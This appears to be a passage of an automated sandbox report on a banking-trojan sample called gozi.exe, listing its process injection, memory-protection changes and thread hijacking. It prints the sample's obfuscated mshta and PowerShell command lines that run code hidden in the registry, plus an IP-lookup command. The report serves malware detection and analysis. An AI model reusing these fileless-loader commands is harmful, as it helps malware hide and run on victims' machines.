Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580

Writes to foreign memory regions

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EDB112E0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: F00000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory written: C:\Windows\System32\control.exe base: 7FF7EDB112E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 93E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AE0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 2B40000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF71E075FD0
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 20FDE800000
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF71E075FD0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057C000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E2E000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5220000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290B0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D50000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 93E000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AE0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 2B40000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread register set: target process: 5676	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 4364
Source: C:\Windows\explorer.exe	Thread register set: target process: 4084
Source: C:\Windows\explorer.exe	Thread register set: target process: 4176
Source: C:\Windows\explorer.exe	Thread register set: target process: 4440
Source: C:\Windows\explorer.exe	Thread register set: target process: 6020

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Djqr='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Djqr).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior

Source: C:\Users\user\Desktop\gozi.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pflixjr -value gp; new-alias -name finjvcqe -value iex; finjvcqe ([System.Text.Encoding]::ASCII.GetString((pflixjr "HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550").UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hscan34n.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5n300s0s.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F8.tmp" "c:\Users\user\AppData\Local\Temp\CSC8CA7551FEF4543EEA6FB885A13AF16EB.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8712.tmp" "c:\Users\user\AppData\Local\Temp\CSC31C5CF8C116B47DEB51FEE2BA7A26AB5.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001F.00000000.484628610.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.505140631.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 0000001F.00000000.503987373.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.488892190.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 0000001C.00000000.469074340.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.465260202.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.471491921.000001DC0D5A0000.00000002.00020000.sdmp, control.exe, 0000001C.00000000.472861662.000001DC0D5A0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.485613611.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.479355928.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.506030252.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 0000001F.00000000.504541058.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.559039260.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.571537082.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.550879240.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000002.818148619.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.539144310.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.533603694.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.545322297.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.567069601.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001F.00000000.493795912.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.495291649.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.514646186.0000000008778000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.521666713.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

8_2_00401AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Users\user\Desktop\gozi.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
